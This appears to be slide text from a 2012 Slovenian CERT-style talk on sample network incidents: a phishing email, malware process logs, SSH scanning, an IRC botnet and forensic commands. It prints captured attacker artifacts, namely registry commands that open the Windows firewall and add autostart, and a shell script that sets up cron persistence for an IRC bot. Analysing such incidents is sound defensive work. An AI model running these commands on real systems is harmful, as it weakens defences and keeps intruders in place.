2012 Vzorčni primeri omrežnih incidentov

vzorčni primeri omrežnih incidentov

[email protected]

mailto:[email protected]

Copyright Carnegie Mellon University

Daj človeku ukradeno kreditno kartico in bo en dan jedel kot kralj.Nauči ga kako se ribari, pa bo preskrbljen za življenje.

-- starodaven nigerijski pregovor

Received: from [98.139.xxx.xxx] by web141006.mail.bf1.yahoo.com via HTTP; Wed, 11 Apr 2012 12:15:40 PDTX-Mailer: YahooMailWebService/0.8.117.340979References: <[email protected]> <[email protected]> <[email protected]> <[email protected]> <[email protected]> <[email protected]> <[email protected]> <[email protected]> <[email protected]> <[email protected]> <[email protected]> <[email protected]> <[email protected]> <[email protected]> <[email protected]> <[email protected]> <[email protected]> <[email protected]> <[email protected]> <[email protected]> <[email protected]> <[email protected]> <[email protected]> <[email protected]> <[email protected]> <[email protected]> <[email protected]> <[email protected]>Message-ID: <[email protected]>Date: Wed, 11 Apr 2012 12:15:40 -0700 (PDT)From: Xxxx Xxxxx <[email protected]>Reply-To: Xxxx Xxxxx <[email protected]>Subject: =?utf-8?B?Rnc6IGZpbmFuxI1uYSBrYXJ0aWNhICggcmHEjXVub3ZvZHNrYSBzbHXFvmJh?= =?utf-8?B?KQ==?=To: "[email protected]"Cc: [email protected]: <[email protected]>

mailto:[email protected]

Operation: Process CreateResult: SUCCESSCommand line: "C:\Program Files\SumatraPDF\SumatraPDF.exe" "C:\Documents and Settings\tt\Application Data\navodila_pogodba_ePOBOT_AJPES.pdf"

cmd /c REG ADD HKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile /v "DoNotAllowExceptions" /t REG_DWORD /d "0" /f cmd /c REG ADD HKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List /v "C:\Documents and Settings\user\Application Data\svchost.exe" /t REG_SZ /d "C:\Documents and Settings\user\Application Data\svchost.exe:*:Enabled:Windows Messanger" /f cmd /c REG ADD HKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List /v "C:\Documents and Settings\user\Application Data\Svchost32.exe" /t REG_SZ /d "C:\Documents and Settings\user\Application Data\Svchost32.exe:*:Enabled:Windows Messanger" /f

"HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce" + "IeXplorer32" "C:\Users\User\AppData\Roaming\Prometna_Kartica_Apr2012.exe"

$ whois 178.172.xxx.xxx

inetnum: 178.172.xxx.0 - 178.172.xxx.255netname: ARNES-NETdescr: Academic and Research Network of Sloveniadescr: Ljubljanadescr: Slovenia

# netstat -anpt | more ... 178.172.xxx.xxx:44947 178.17.86.40:22 SYN_SENT - 178.172.xxx.xxx:40448 178.17.86.42:22 SYN_SENT - 178.172.xxx.xxx:47351 178.17.86.35:22 SYN_SENT - 178.172.xxx.xxx:57112 178.17.85.142:22 SYN_SENT - 178.172.xxx.xxx:44947 178.17.86.48:22 SYN_SENT - 178.172.xxx.xxx:40448 178.17.86.242:22 SYN_SENT - 178.172.xxx.xxx:47351 178.17.86.135:22 SYN_SENT - 178.172.xxx.xxx:57112 178.17.85.12:22 SYN_SENT - 178.172.xxx.xxx:44947 178.17.86.50:22 SYN_SENT - 178.172.xxx.xxx:40448 178.17.86.92:22 SYN_SENT - 178.172.xxx.xxx:47351 178.17.86.25:22 SYN_SENT - 178.172.xxx.xxx:57112 178.17.85.122:22 SYN_SENT - ...

# netstat -anpt | more ...178.172.xxx.xxx:48174 208.83.20.130:6667 ESTABLISHED 5472/-bash178.172.xxx.xxx:57221 194.109.20.90:6667 ESTABLISHED 5472/-bash 178.172.xxx.xxx:34110 195.197.175.21:7000 ESTABLISHED 5472/-bash...

$ dig –x 208.83.20.130

130.20.83.208.in-addr.arpa. 195 IN PTR Tampa.FL.US.Undernet.org.90.20.109.194.in-addr.arpa. 86400 IN PTR undernet.xs4all.nl.21.175.197.195.in-addr.arpa. 14400 IN PTR irc2.saunalahti.fi.

# lsof -np 5472...-bash 5472 root txt REG 8,1 35352 /var/spool/samba/.bash/-bash...

# file /var/spool/samba/.bash/*./autorun: POSIX shell script text executable./-bash: ELF 32-bit LSB executable, Intel 80386, version./cron.d: ASCII text./cyc.acc: ASCII text./cyc.hold: a /usr/bin/perl script text executable./cyc.pid: ASCII text./cyc.session: ASCII text./cyc.set: ASCII English text./go: ASCII text./mech.dir: ASCII text./m.help: data./pico: ELF 32-bit LSB executable, Intel 80386, version 1./run: POSIX shell script text executable./stealth: ELF 32-bit LSB executable, Intel 80386, version 1./update: POSIX shell script text executable

$ cat /var/spool/samba/.bash/autorun#!/bin/shpwd > mech.dirdir=$(cat mech.dir)echo "* * * * * $dir/update >/dev/null 2>&1" > cron.dcrontab cron.d && perl cyc.holdcrontab -l | grep updateecho "#!/bin/shif test -r $dir/cyc.pid; then pid=\$(cat $dir/cyc.pid)if \$(kill -CHLD \$pid >/dev/null 2>&1); then exit 0fificd $dirrm -rf cyc.hold./run &>/dev/null" > updatechmod u+x update

$ grep Accepted secureMay 4 11:29:09 spxxxxx sshd[22429]: Accepted password for bxxx from 193.2.xxx.xxx port 60429 ssh2May 4 11:29:52 spxxxxx sshd[22453]: Accepted password for bxxx from 193.2.xxx.xxx port 60438 ssh2May 4 11:56:45 spxxxxx sshd[22697]: Accepted password for root from 209.172.51.39 port 48792 ssh2May 4 16:05:46 spxxxxx sshd[23079]: Accepted password for root from 79.118.61.94 port 1079 ssh2May 4 18:05:39 spxxxxx sshd[17116]: Accepted password for root from 14.63.213.191 port 48309 ssh2May 5 10:42:35 spxxxxx sshd[22874]: Accepted password for root from 202.199.160.210 port 40019 ssh2May 5 11:52:38 spxxxxx sshd[23117]: Accepted password for root from 86.124.223.6 port 2058 ssh2May 5 11:56:29 spxxxxx sshd[23184]: Accepted password for root from 86.124.223.6 port 2061 ssh2May 5 11:57:18 spxxxxx sshd[23197]: Accepted password for root from 86.124.223.6 port 2062 ssh2May 5 11:57:28 spxxxxx sshd[23204]: Accepted password for root from 86.124.223.6 port 2063 ssh2

Now talking on #xhack * Topic for #xhack is: ./a 178.17;./a 201.251;./a 195.76;./a 195.248;./a 81.211 129.25 128.32 144.30 134.50 * Topic for #xhack set by BaRoZ at Sun May 01 16:21:28 2011...<BaRoZ> nuf1f_ say a<BaRoZ> nuf1f_ say a<BaRoZ> +kb nuf1f_ * start__ sets ban on *!*[email protected].*.* > > * You have been kicked from #xhack by start__ (Requested Kick)

* /who #xhack* #xhack ~Fly 178.172.xxx.xxx *.undernet.org sasesase H :3 Powerd by move* #xhack ~Fly 124.82.70.197 *.undernet.org informati H@ :3 Powerd by move* #xhack ~Fly 121.241.77.194 *.undernet.org luccc H@ :3 Powerd by move* #xhack ~Fly biophys3.physics.usyd.edu.au *.undernet.org biophys3 H@ :3 Powerd by move* #xhack ~chattr 218.189.204.215 *.undernet.org DHL H@ :3 chattr* #xhack ~Fly 93-44-208-192.ip98.fastwebnet.it *.undernet.org valy____ H@ :3 Powerd by move* #xhack ~lolipop 182-166-5-237f1.shg1.eonet.ne.jp *.undernet.org part_ H@ :3 lolipop* #xhack ~lolipop Edd.users.undernet.org *.undernet.org valyca H@x :3 lolipop* #xhack ~luzar MService.users.undernet.org *.undernet.org VaLi H@x :3 luser* #xhack ~alpha 62.94.13.227 *.undernet.org vali__ H@ :3 omega* #xhack ~circ 82.193.22.182 *.undernet.org start__ H@ :3 circ* #xhack ~chattr 82.193.22.182 *.undernet.org start___ H@ :3 chattr* #xhack ~circ 122.99.166.142 *.undernet.org removed__ H@ :3 circ* #xhack ~Fly 80.82.17.151 *.undernet.org xHaCk H@ :3 Powerd by move* #xhack ~lolipop a83-161-134-137.adsl.xs4all.nl *.undernet.org valyca__ H@ :3 lolipop* #xhack ~circ a83-161-134-137.adsl.xs4all.nl *.undernet.org removed H@ :3 circ* #xhack ~chattr a83-161-134-137.adsl.xs4all.nl *.undernet.org moved H@ :3 chattr* #xhack ~circ 62.94.13.227 *.undernet.org VaLi_ H@ :3 circ* #xhack ~lolipop 82.193.22.182 *.undernet.org start_ H@ :3 lolipop* #xhack ~lolipop 190.114.224.11 *.undernet.org valyca_ H@ :3 lolipop* #xhack ~chattr 122.99.166.142 *.undernet.org VaLy___ H@ :3 chattr* #xhack ~circ 190.114.224.11 *.undernet.org removed_ H@ :3 circ* #xhack ~VaLy hax0r.users.undernet.org *.undernet.org BaRoZ H@x :3 VaLy* #xhack ~Aly 50.16.26.202 *.undernet.org gzip H@ :3 Powerd by move* #xhack ~chattr 190.114.224.11 *.undernet.org moved_ H@ :3 chattr* #xhack ~UK mail.pjsind.co.uk *.undernet.org part____ H@ :3 Powerd by move* #xhack ~circ Ezl.users.undernet.org *.undernet.org valentin H@x :3 circ* #xhack ~bursuc sd-23267.dedibox.fr *.undernet.org VaLy_ H@ :3 Powerd by move* #xhack ~lolipop 122.99.166.142 *.undernet.org valyca___ H@ :3 lolipop* #xhack ~Fly 88.191.129.21 *.undernet.org Valeriu H@ :3 Powerd by move* #xhack ~Fly 46.28.110.179 *.undernet.org pizdel H@ :3 Powerd by move* #xhack ~Kitty xray426.server4you.de *.undernet.org move H@ :3 Powerd by move* #xhack ~Fly v-182-163-56-103.ub-freebit.net *.undernet.org valy_____ H@ :3 Powerd by move* #xhack ~chattr 182-166-5-237f1.shg1.eonet.ne.jp *.undernet.org cUc H@ :3 chattr* #xhack :End of /WHO list.

# find / -ctime -10 –print # ps –ef# find / -mtime -5 –ls # lsof –np PID# find / -amin -120 –print # lsof –ni TCP:22# stat somefile # pstree -aAp# cat .bash_history # last -i# ls –la # file somefile.bin# ls –lct # strings somefile.bin# ls –l /proc/PID/# chkrootkit# rkhunter

Internet

2012 Vzorčni primeri omrežnih incidentov